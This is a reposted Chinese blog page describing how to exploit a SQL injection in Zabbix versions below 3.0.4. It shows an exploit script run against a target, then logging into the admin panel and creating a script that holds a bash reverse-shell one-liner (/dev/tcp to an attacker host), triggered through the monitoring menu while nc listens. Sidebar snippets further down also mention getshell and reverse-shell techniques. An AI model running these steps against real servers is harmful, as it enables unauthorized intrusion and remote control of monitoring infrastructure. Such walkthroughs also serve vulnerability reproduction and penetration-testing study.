Zabbix sql注入漏洞脚本执行反弹shell

最新推荐文章于 2024-07-18 15:04:46 发布
最新推荐文章于 2024-07-18 15:04:46 发布
阅读量834 收藏 1
点赞数
文章标签: shell 运维 python
原文链接:http://www.cnblogs.com/someone9/p/9057591.html
版权

exp检测是否存在SQL注入漏洞
root@ubuntu:~# python zabbix.py http://ip:9090/
+------------------------------------------------------------+
Python Zabbix<3.0.4 SQL注入 Exploit
success
+------------------------------------------------------------+
Zabbix 存在SQL注入漏洞!

管理员 用户名密码:None

管理员 Session_id:None
然后进行登录:管理——脚本——创建脚本写入反弹shell、
bash -i >& /dev/tcp/xxx/1234 0>&1

 

 

监测——触发器——主机

执行我们编写的反弹shell脚本:

Nc监听端口

 

转载于:https://www.cnblogs.com/someone9/p/9057591.html

weixin_30919429
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell脚本一键安装zabbix4.0
08-24
5. **初始化数据库**:脚本会运行Zabbix服务器提供的SQL脚本,创建必要的表结构。 6. **启动服务**:脚本会启动Zabbix服务器和Zabbix代理(如果需要的话)。 7. **设置启动自启**:脚本可能会添加Zabbix服务到启动...
mysql中添加字段
热门推荐
m0_54850467的博客
09-11 4万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
漏洞复现】Zabbix弱口令再到命令执行Getshell
cjstang的博客
06-29 2789
Zabbix使用默认口令成功进入平台,写入shell脚本反弹shell
Zabbix SQL注入(CVE-2016-10134)
最新发布
qq_23003811的博客
07-18 182
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入。3、发现注入点profileIdx、profileIdx2。2、sqlmap跑注入点。
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
吾所在处,即为净土
05-19 1886
如果你坚持了自己的梦想,全世界都会为你让路。
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 942
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 968
zabbix-latest.php-SQL注入漏洞
zabbix ansible部署脚本
02-13
5. **初始化数据库**:运行Zabbix的数据库脚本来创建表结构,如`zabbix_db_create.sql`。 6. **配置Zabbix Server和Web界面**:根据实际环境配置`zabbix_server.conf`和`zabbix.conf.php`,包括数据库连接信息、Web...
zabbix-scripts:可用于出色的监控工具Zabbix脚本
05-22
Zabbix中,Shell脚本可以用来执行远程检查,获取服务器上的特定信息,例如磁盘空间、CPU使用率、内存利用率等。 在"zabbix-scripts-master"目录中,每个脚本都有详细的注释,这是非常关键的,因为注释提供了脚本...
bat/cmd批处理连接SqlServer数据库查询脚本
09-22
在本文中,作者介绍了一种利用Windows批处理(bat/cmd)脚本来连接SqlServer数据库执行查询的方法。批处理脚本是一种传统的自动化脚本语言,常用于Windows操作系统中批量执行命令。SqlServer是微软公司开发的一个...
zabbix通过自动发现监控oracle的一键部署脚本
07-26
为了确保脚本的成功运行,你需要在Zabbix Server和Oracle数据库服务器上配置好相应的环境,包括安装必要的软件(如Oracle客户端和Zabbix代理),设置数据库连接参数,以及在Zabbix中配置好自动发现规则。 在实际...
zabbix 测试shell_利用icmp协议反弹shell
weixin_39636718的博客
01-10 513
介绍有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。当你已经拥有一台机器内部网络或者DMZ的一部分。他并非通过TCP来获得reverse shell的,所以不考虑绑定shell。然而有关UDP,通常是一个DNS隧道或通过ICMP的渠道来获得一个reverse shell。而...
三分钟让你完全理解反弹shell拿权限的原理
hyjcking的博客
12-03 614
反弹shell作为常见的攻击手段,攻击者可以利用应用程序漏洞,建立反向shell连接,从而获取对系统的交互式访问权限。一旦获得了对系统的访问权限,攻击者可以进行侦听,横向移动及尝试提升特权,达到窃取系统或数据库中敏感数据的目的。反弹shell作为外网渗透的最后一步、内网渗透的第一步,其对服务器安全乃至内网安全的危害不言而喻。「认识反弹shell」众所周知,正常的攻击方式是攻击者攻击一台目标机器,会在目标机器上打开一个端口,然后去连接该目标机器,这种连接方式我们称之为正向连接。而多数情况下,被控端位于防火墙之
漏洞复现----26、Zabbix latest.php SQL注入漏洞(CVE-2016-10134)
七天
06-28 728
一、Zabbix概述 Zabbix 是一个企业级分布式开源监控解决方案。Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。 Zabbix由以下组件组成: 1、Server:Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性、系统完整性信息和统计信息。server也是存储所有配置信息、统计信息和操作信息的核心存储库。 2、数据库:所有配置信息以及 Zabbix 采集到的数据都被存储在数据库中。 3、Web 界面为了从任何地方和任何平台轻松访问 Zabbix
vulhub之Zabbix
weixin_56306210的博客
01-22 850
vulhub之Zabbix
Zabbix sql最新注入漏洞及其利用探讨
weixin_44023460的博客
12-09 2691
simeon 在企业和个人安全意识不断增强,对有安全防护的企业来说,渗透比过去相对困难一些,而一些对硬件、资产等管理平台仍然存在弱口令等漏洞,一旦通过这些漏洞打开入口,将对企业安全造成巨大的威胁。Zabbix 是用得非常广泛的网络监测软件,其存在sql注入,声称可以获取管理员密码,虽然Zabbix 3.0.3以下版本存在漏洞,但如何利用,如何测试,您掌握了吗?本文带您实测Zabbix 漏洞,掌握其...
漏洞盒子/Zabbix SQL注入漏洞分析_小白白帽子教程
2401_84915584的博客
06-23 202
zabbix sql注入漏洞爆出来已有好几天了,最近忙于安全盒子用户中心的设计,一直没有去研究这个注入,今天早起,闲暇时间写下该文。
sqlmap 如何 --os-shell反弹shell
weixin_63580357的博客
10-17 994
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
shell编写zabbix6.0安装脚本
05-25
以下是一个简单的 shell 脚本,用于在 CentOS 7 上安装 Zabbix 6.0。在执行脚本之前,请确保您已经以 root 用户身份登录到系统中。 ```bash #!/bin/bash # 安装依赖库 yum install -y epel-release yum install ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值